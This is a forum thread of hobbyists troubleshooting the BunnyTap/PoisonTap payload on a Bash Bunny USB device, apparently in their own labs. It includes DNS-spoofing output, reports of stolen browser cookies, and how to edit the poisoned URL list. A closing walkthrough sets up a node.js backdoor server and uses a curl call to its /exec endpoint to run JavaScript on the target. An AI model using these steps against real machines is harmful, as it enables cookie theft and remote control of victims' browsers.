graythang Posted March 18, 2017

Having a lot of fun playing with BB and BunnyTap. I've gotten it to load and run; however, I'm seeing a bit of strangeness.

1) The payload.txt runs without throwing an error, but when I ssh into the BB and do a "ps -aux | grep -i screen" I only see the /usr/bin/node.js running. When I run the line from the payload.txt file "/usr/bin/screen -dmS dnsspoof /usr/sbin/dnsspoof -i usb0 port 53" and run the grep again, it shows up in the list. At this point I'm looking for the DNS requests to be redirected, but no-joy on that, so I unplug and restart from scratch.

After BB & BunnyTap start up again I ssh back in and check, and again dnsspoof isn't running. So this time I ran it using "/usr/sbin/dnsspoof -i usb0 port 53" so I could see any output. Testing DNS requests this time resulted in the dnsspoof responses below, but again all DNS requests come back with the correct IP (used dig, ping and browser in testing). Wireshark running on the OS X side didn't show any DNS traffic from the BB either (tried it with capture set for the BB interface and again using the interface on the OS X).

Anyone else seen this behavior (if so how'd you fix it)? Whistle Master - any ideas/tests that I can try?

Thanks

<dnsspoof output>
172.16.64.1.36702 > 8.8.8.8.53: 60675+ A? citibank.com
172.16.64.1.52442 > 8.8.8.8.53: 2452+ A? google.com
172.16.64.1.44733 > 8.8.8.8.53: 7511+ A? citibank.com
172.16.64.1.59932 > 8.8.8.8.53: 47184+ A? anyhwere.com
172.16.64.1.44565 > 8.8.8.8.53: 57995+ A? anyhwere.com
172.16.64.1.50786 > 8.8.8.8.53: 32458+ A? anyhwere.com
172.16.64.1.44234 > 8.8.8.8.53: 12251+ A? anyhwere.com
172.16.64.1.58344 > 8.8.8.8.53: 10966+ A? example.cm
172.16.64.1.57680 > 8.8.8.8.53: 35170+ A? example.com
172.16.64.1.58216 > 8.8.8.8.53: 10032+ A? may.com
graythang Posted March 18, 2017

k.... dnsspoof not running at start-up resolved. Still no-joy with redirects..
graythang Posted March 18, 2017

Update: I plugged BB w/BT into a Windows 7 laptop and it ran like a champ, dumping cookies into the posontap.cookies.log. But for reasons I haven't sorted out yet it appears the BunnyTap is getting no love from the iMac (runs but nothing on screen and no cookies in the log file). Going to try it on a MBP just as soon as the wife isn't looking (evil grin).... just kidding, she's used to my "testing" stuff on her system. Deal is "I break it - I bought it" lol

If anyone has already successfully run BunnyTap on an iMac (or a MBP for that matter), I'd appreciate it if you gave a quick reply to let me know.

Thanks
MrMoi Posted March 19, 2017

Hi everyone! I can't install dnsspoof.. my BashBunny is still blinking white.. I've shared my network card and fixed an IP to the BashBunny. What did I do wrong? Thank you
wrewdison Posted March 20, 2017

On 3/18/2017 at 1:35 PM, graythang said:
Update: I plugged BB w/BT into a Windows 7 laptop and it ran like a champ, dumping cookies into the posontap.cookies.log. But for reasons I haven't sorted out yet it appears the BunnyTap is getting no love from the iMac (runs but nothing on screen and no cookies in the log file). Going to try it on a MBP just as soon as the wife isn't looking (evil grin).... just kidding, she's used to my "testing" stuff on her system. Deal is "I break it - I bought it" lol If anyone has already successfully run BunnyTap on an iMac (or a MBP for that matter), I'd appreciate it if you gave a quick reply to let me know. Thanks

Did you change the ATTACKMODE in the payload.txt?
MrMoi Posted March 20, 2017

Thanks for your answer. I changed it to ATTACKMODE RNDIS_ETHERNET, I'm on Windows but it's not working.
wrewdison Posted March 20, 2017

I've not tried it on Mac yet, but I'll play around with it tonight.
graythang Posted March 20, 2017

3 hours ago, wrewdison said:
Did you change the ATTACKMODE in the payload.txt?

sure did
Gachnang Posted March 22, 2017

@MrMoi I have installed it manually: Plug in with "ATTACKMODE RNDIS_ETHERNET", share connection, open putty and run "apt-get -y install dsniff". After that, removed 'install.sh'. BunnyTap is working great for me!

Also, I have added some tweaks to share: https://github.com/hak5/bashbunny-payloads/pull/81
graythang Posted March 30, 2017

On 3/14/2017 at 7:33 PM, Onus said:
q

I've got the backend server up and running and curl commands work (I can send cmds to the client via the backdoor across the Internet). Working on a hiccup - once I have it resolved I'll post a walkthrough on how I set it up if anyone is still interested in it for their own lab.

The hiccup I'm working on is on the client side... BunnyTap runs, collects cookies, but ws isn't opened and it appears the backdoor isn't getting installed (i.e. cached) during the run. I can manually open the backdoor file I copied over to the client in the browser and it triggers the web service connection, and at this point I can send curl commands etc. So the file works, but only if I kick it off manually. Client is Win7 and I get the same results in both IE 11 and Chrome. Odd.
wrxratd Posted March 31, 2017

On 3/29/2017 at 10:34 PM, graythang said:
I've got the backend server up and running and curl commands work (I can send cmds to the client via the backdoor across the Internet). Working on a hiccup - once I have it resolved I'll post a walkthrough on how I set it up if anyone is still interested in it for their own lab. The hiccup I'm working on is on the client side... BunnyTap runs, collects cookies, but ws isn't opened and it appears the backdoor isn't getting installed (i.e. cached) during the run. I can manually open the backdoor file I copied over to the client in the browser and it triggers the web service connection, and at this point I can send curl commands etc. So the file works, but only if I kick it off manually. Client is Win7 and I get the same results in both IE 11 and Chrome. Odd.

Yes a walkthrough would be clutch
Mr.Pupp3T Posted April 2, 2017

So I have the poison tap files, but when trying to get it to work I get the blinking red light, then it goes to white and sits there forever...... Anyone successfully installed the poisontap on bashbunny?
Mr.Pupp3T Posted April 2, 2017

When trying to install the ./install I'm getting permissions denied. I've tried everything to get it to work. Any ideas?
Dave-ee Jones Posted April 3, 2017

5 hours ago, Mr.Pupp3T said:
When trying to install the ./install I'm getting permissions denied. I've tried everything to get it to work. Any ideas?

Including run as admin? :P
Gachnang Posted April 3, 2017

@Mr.Pupp3T To install it manually:

1. Share internet (http://wiki.bashbunny.com/#!./index.md#Sharing_an_Internet_Connection_with_the_Bash_Bunny_from_Windows)
2. Connect over TCP (172.16.64.1) to the BashBunny
3. Run ping 8.8.8.8 to be sure internet is working (ping Google's DNS)
4. Run apt-get -y install dsniff to install "dsniff"
5. Delete (or rename) "install.sh" in the switch# folder where PoisonTap is so the bunny doesn't try to run it (red blinking when failed / no internet, you already installed dependencies in step 4!) (Maybe easier when you replug the BashBunny in arming mode (Serial and storage))
6. Try it again

@Dave-ee Jones On the BashBunny, you log in as "root", so you already call everything as admin.. As funny as "Have you tried to turn it off and back on again?" :P
Gachnang Posted April 3, 2017

6 hours ago, Mr.Pupp3T said:
When trying to install the ./install I'm getting permissions denied. I've tried everything to get it to work. Any ideas?

1 hour ago, Dave-ee Jones said:
Including run as admin? :P

Just figured out what could be the problem.. Have you tried to install it on your local machine instead of on the BashBunny? Install it on the BashBunny, not on your computer. BashBunny needs it, not you ;)
Mr.Pupp3T Posted April 3, 2017

3 hours ago, Gachnang said:
@Mr.Pupp3T To install it manually:
1. Share internet (http://wiki.bashbunny.com/#!./index.md#Sharing_an_Internet_Connection_with_the_Bash_Bunny_from_Windows)
2. Connect over TCP (172.16.64.1) to the BashBunny
3. Run ping 8.8.8.8 to be sure internet is working (ping Google's DNS)
4. Run apt-get -y install dsniff to install "dsniff"
5. Delete (or rename) "install.sh" in the switch# folder where PoisonTap is so the bunny doesn't try to run it (red blinking when failed / no internet, you already installed dependencies in step 4!) (Maybe easier when you replug the BashBunny in arming mode (Serial and storage))
6. Try it again
@Dave-ee Jones On the BashBunny, you log in as "root", so you already call everything as admin.. As funny as "Have you tried to turn it off and back on again?" :P

5 ok so I have done what you have said above. I'm running the dsniff command, and it says failed to fetch the required files.
Bryfi Posted April 3, 2017

Weird. I am not getting poisontap to work on locked computers with browsers open. Anyone get this feature to work?
PoSHMagiC0de Posted April 5, 2017

So I have been playing with this. Worked right off the bat. Noticed on my Windows 10 test machine it fires up the browser automatically. Wonder if it pretends to be a hotel network with a captive portal, and MS with all their auto stuff fires off a browser to it so you can okay the agreement?

Anyway. I have been wondering how you can modify the poison url list? Have not been able to find it yet. Must be missing something. Wondered if it can be changed for more targeted attacks.

Have issues getting the poisoned pages to respond back to my backend server that is on another machine, but have a funny feeling it might be because of a domain violation with an external site trying to talk to an internal site. Might have to try using a hosted to host it and see what happens.
Gachnang Posted April 5, 2017

6 hours ago, PoSHMagiC0de said:
I have been wondering how you can modify the poison url list? Have not been able to find it yet.

At the bottom of "target_injected_xhtmljs.html" is a function called "getDoms" which returns the list of urls. You can freely edit it there.
Bryfi Posted April 7, 2017

Bunnytap from repo not working with 1.1. No results popping up and LED turns off completely afterwards but stays red.

UPDATE: Seems to be completely incompatible with new firmware. Tried repo and modified versions of bunnytap and it seems to be broken. Other updated payloads are working fine.
maehko Posted April 9, 2017

I was running into a similar issue and it appears that the new firmware fails on previously valid LED combinations. For instance, any reference to LED R G B now seems to fail on firmware 1.1 since the proper syntax is now LED W. I was able to get this to work by replacing all combination LED commands in install.sh and payload.txt with the new composite LED commands.

This seems like an oversight and will probably break all previously created scripts that used combo-LED commands. I would expect a future update that will accept both multi and composite codes so previous payloads using multi-codes won't continue to fail just because of the syntax change.
Bryfi Posted April 10, 2017

On 4/9/2017 at 1:36 AM, maehko said:
I was running into a similar issue and it appears that the new firmware fails on previously valid LED combinations. For instance, any reference to LED R G B now seems to fail on firmware 1.1 since the proper syntax is now LED W. I was able to get this to work by replacing all combination LED commands in install.sh and payload.txt with the new composite LED commands. This seems like an oversight and will probably break all previously created scripts that used combo-LED commands. I would expect a future update that will accept both multi and composite codes so previous payloads using multi-codes won't continue to fail just because of the syntax change.

Can't get it to run anymore. The lights come on but the attack does not work. Nothing pops up stating I am getting cookies. Think this is the only payload that is bricked for me besides quickcreds. I edited like you said you did and nothing pops up anymore.
graythang Posted April 11, 2017

On 3/30/2017 at 11:27 PM, wrxratd said:
Yes a walkthrough would be clutch

Things have gotten really hectic and I haven't had the chance to do this up right. But since someone asked about it, here is a brief rundown on how I set up node.js.

You will need to set up a URL that you can use. I was lazy and set up a DYNDNS to point back to myself, then used VMs in bridged mode and let them run (it was simpler for me to open the inbound port I used on my FW whenever I was testing and close it afterwards).

Next - I installed node.js on Kali. I followed these instructions (https://relutiondev.wordpress.com/2016/01/09/installing-nodejs-and-npm-kaliubuntu/). When finished with the install, run "npm install websocket" (the setup wouldn't work until I did this bit).

Next, load up poison tap on Kali using "git clone https://github.com/samyk/poisontap.git". If you're using the default port (1337), no other changes are needed. But you'll need to read Samy's instructions and update a few files if you're changing the port.

Now, edit the BunnyTap "backdoor.html", replacing all occurrences of "YOUR.DOMAIN" with your DYNDNS URL.

On Kali, cd into the poisontap directory and run "node backend_server.js". The response you should see will have "Server is listening on port 1337" listed in it.

Now take the BB and run your attack.

*****notes******

Even though both are on my network, the traffic from target to node.js server was: [target Win7 vm] -> Internet -> DynDNS -> [my FW] -> [Kali Vm]

As I noted in my previous post, I found that the attack worked but the back door wasn't available until I manually ran the "backdoor.html" on the target. Once I did, I could use a curl command on Kali to have the node.js pop an alert on the Win7 target, e.g.: curl 'http://myDYNDNS.URL:1337/exec?alert("test")'

Haven't had time to work out why the back door isn't automatically loading on the target when the attack is run yet.

Sorry about the rush job and I hope this helps someone a little.
zippythechimp Posted October 5, 2017

Do you have to use a registered url or will a static IP work for the public server?
Archived
This topic is now archived and is closed to further replies.